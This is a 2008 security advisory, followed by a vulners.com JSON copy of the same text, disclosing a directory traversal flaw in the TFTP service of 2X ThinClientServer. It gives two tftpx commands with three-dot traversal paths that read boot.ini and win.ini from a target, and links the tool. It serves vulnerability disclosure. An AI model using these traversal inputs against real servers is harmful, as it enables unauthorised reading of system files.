#######################################################################
Luigi Auriemma
Application: 2X ThinClientServer
http://www.2x.com/thinclientserver/
Versions: <= v5.0_sp1-r3497
(TFTPd.exe <= 3.2.0.0)
Platforms: Windows
Bug: directory traversal
Exploitation: remote
Date: 29 Mar 2008
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From the manual:
"2X ThinClientServer allows you to deploy a thin client OS to low-cost
thin client devices and existing PCs, and centrally manage settings and
configure to which terminal servers (Windows or Linux) a user should
log on to."
#######################################################################
======
2) Bug
======
The 2X TFTP Service enabled by default in ThinClientServer is affected
by a directory traversal vulnerability exploitable through the usage of
a sequence of 3 dots (instead of the classical two) for reaching the
various parent directories.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/tftpx.zip
tftpx SERVER .../.../.../.../.../.../boot.ini none
tftpx SERVER ...\...\...\...\...\...\windows\win.ini none
#######################################################################
======
4) Fix
======
No fix
#######################################################################
---
Luigi Auriemma
http://aluigi.org
{"id": "SECURITYVULNS:DOC:19546", "bulletinFamily": "software", "title": "Directory traversal in 2X ThinClientServer v5.0_sp1-r3497", "description": "\r\n#######################################################################\r\n\r\n Luigi Auriemma\r\n\r\nApplication: 2X ThinClientServer\r\n http://www.2x.com/thinclientserver/\r\nVersions: <= v5.0_sp1-r3497\r\n (TFTPd.exe <= 3.2.0.0)\r\nPlatforms: Windows\r\nBug: directory traversal\r\nExploitation: remote\r\nDate: 29 Mar 2008\r\nAuthor: Luigi Auriemma\r\n e-mail: aluigi@autistici.org\r\n web: aluigi.org\r\n\r\n\r\n#######################################################################\r\n\r\n\r\n1) Introduction\r\n2) Bug\r\n3) The Code\r\n4) Fix\r\n\r\n\r\n#######################################################################\r\n\r\n===============\r\n1) Introduction\r\n===============\r\n\r\n\r\nFrom the manual:\r\n"2X ThinClientServer allows you to deploy a thin client OS to low-cost\r\nthin client devices and existing PCs, and centrally manage settings and\r\nconfigure to which terminal servers (Windows or Linux) a user should\r\nlog on to."\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n2) Bug\r\n======\r\n\r\n\r\nThe 2X TFTP Service enabled by default in ThinClientServer is affected\r\nby a directory traversal vulnerability exploitable through the usage of\r\na sequence of 3 dots (instead of the classical two) for reaching the\r\nvarious parent directories.\r\n\r\n\r\n#######################################################################\r\n\r\n===========\r\n3) The Code\r\n===========\r\n\r\n\r\nhttp://aluigi.org/testz/tftpx.zip\r\n\r\n tftpx SERVER .../.../.../.../.../.../boot.ini none\r\n tftpx SERVER ...\...\...\...\...\...\windows\win.ini none\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n4) Fix\r\n======\r\n\r\n\r\nNo fix\r\n\r\n\r\n#######################################################################\r\n\r\n\r\n--- \r\nLuigi Auriemma\r\nhttp://aluigi.org", "published": "2008-04-01T00:00:00", "modified": "2008-04-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19546", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:25", "edition": 1, "viewCount": 15, "enchantments": {"score": {"value": 2.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8851"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8851"]}]}, "exploitation": null, "vulnersScore": 2.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645497317, "score": 1659803227}, "_internal": {"score_hash": "a1664b3393c8f34b5165bcb399a8d7bf"}}